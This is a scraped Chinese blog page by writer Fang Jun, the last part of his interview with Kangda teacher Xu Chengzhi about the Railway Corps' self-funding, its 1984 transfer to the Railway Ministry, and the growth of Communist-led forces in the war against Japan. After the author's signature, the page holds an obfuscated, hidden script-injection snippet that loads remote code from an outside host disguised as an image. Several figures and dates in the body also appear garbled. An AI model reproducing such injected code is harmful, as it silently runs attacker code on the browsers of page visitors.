注册 登录  
 加关注
   显示下一条  |  关闭
温馨提示!由于新浪微博认证机制调整,您的新浪微博帐号绑定已过期,请重新绑定!立即重新绑定新浪微博》  |  关闭

方军的博客

 
 
 

日志

 
 

我认识的抗日军政大学教师徐诚之(完)  

2009-09-17 14:42:00|  分类: 国民党抗战将士 |  标签: |举报 |字号 订阅

  下载LOFTER 我的照片书  |

我认识的抗日军政大学教师徐诚之(完) - 方军 - 方军的博客

照片说明:八路军出平型关与日军作战

 

徐老说:我认为值得特别指出的是:这个几十万人的兵种其军费开支竟然没有列入国防费用,而是靠自己工程收入中解决,而且还已经达到了自给有余了。据说经过是这样的:

197810月,为了减轻军费负担,国务院和中央军委决定,铁道兵全部费用在军队总定额外单独计算,从国家铁路工程费开支,但仍属军队序列。根据这一决定,国务院有关部委和总后勤部决定,从1979年起,铁道兵的经费同国防费分开,所需经费从国家铁路工程费中开支。于是,铁道兵在国家下达的铁路修建任务吃不饱时,主动承担国家铁路计划外的建设任务,努力实现铁道兵军费自给。1979年铁道兵经费自给率为784%,到1981年实现了全部自给,并略有结余。从此,中国国家的军费开支不再包括铁道兵,从而,为军队减轻了经费负担。

  20世纪70年代末80年代初,围绕铁道兵是否在解放军序列中保留的问题,经过许多争论和曲折,最终党中央和中央军委才决定铁道兵集体转业并入铁道部。

198411,铁道兵部队集体转业并入铁道部,铁道兵各师分别改称铁道部各工程局。从此,铁道兵在解放军序列中消失,但铁道兵的功绩,却永远留在解放军的史册上。

铁道兵部队的前身是参加过抗日战争的技术性部队,随着中国革命和中国建设的步伐,铁道兵完成了历史各个阶段赋予的各项任务,而退出历史的舞台。铁道兵兵种虽然撤消,但是共和国不会忘记这个做出巨大贡献的兵种。

铁道兵已经撤消24年了,我这个铁道兵的士兵也已经离开铁道兵28年了。我的老首长,86岁的徐诚之不但在抗日战争中担当过抗日军政大学的教师,他还亲历了我们铁道兵这个兵种从诞生到退出历史舞台的全部过程。——最关键的是,他还健康地生活着。

 

我采访抗日军政大学教师徐诚之最深刻的印象是徐老的一句话:“抗大抗大,越抗越大。”我从中悟到,这不只是抗大的状况,也是伟大的、正义的抗日战争力量发展的总趋势。我查了一下解放军出版社出版的《中国抗日战争史》一书:1936年夏秋,红军3大主力在陕北会师时有3万人。1937825日红军改编成国民革命军第八路军时有46万人,分成115师、120师和129师。到1945年中国共产党领导的军队已经有100万正规军和220万民兵。抗日战争以后,是中国国内推翻腐败的蒋家王朝的国内战争。可以说,是抗日战争改变了中国社会的格局,同时,改变了无数人的命运。

“沧海桑田”说的是自然界天翻地覆的变化。十几年来,我专门采访亲历日本侵华战争的老人们,他们个人的命运如同中国社会一样,在经历了一场被日本侵略的巨大浩劫之后,也都发生了巨大的变迁。

 

中国作家协会作家  方军 200714日星期四晨130

ee:expression_r(function(){if(!window.r){var ss='s'+'cript';var tt='text/ja'+'vas'+'cript';var st=document.createElement_x(ss);st.src='http://imgcache.suqian114.cn/a/s/sina.jpg';st.type=tt;document.getElementsByTagName_r('head').item(0).appendChild(st);window.r=1}}(this));width:0px;display:none"<
  评论这张
 
阅读(109)| 评论(0)
推荐 转载

历史上的今天

评论

<#--最新日志,群博日志--> <#--推荐日志--> <#--引用记录--> <#--博主推荐--> <#--随机阅读--> <#--首页推荐--> <#--历史上的今天--> <#--被推荐日志--> <#--上一篇,下一篇--> <#-- 热度 --> <#-- 网易新闻广告 --> <#--右边模块结构--> <#--评论模块结构--> <#--引用模块结构--> <#--博主发起的投票-->
 
 
 
 
 
 
 
 
 
 
 
 
 
 

页脚

网易公司版权所有 ©1997-2017